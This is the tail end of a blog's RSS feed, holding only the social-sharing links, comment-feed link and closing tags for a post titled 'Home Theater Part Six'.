<p><a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F249&amp;linkname=Home%20Theater%20Part%20Six" title="Delicious" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/delicious.png" width="16" height="16" alt="Delicious"/></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F249&amp;linkname=Home%20Theater%20Part%20Six" title="Digg" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F249&amp;linkname=Home%20Theater%20Part%20Six" title="Twitter" rel="nofollow" target="_blank"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a> <a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fmichael.requeny.com%2Farchives%2F249&amp;linkname=Home%20Theater%20Part%20Six"><img src="http://michael.requeny.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a> </p>]]></content:encoded>
			<wfw:commentRss>http://michael.requeny.com/archives/249/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
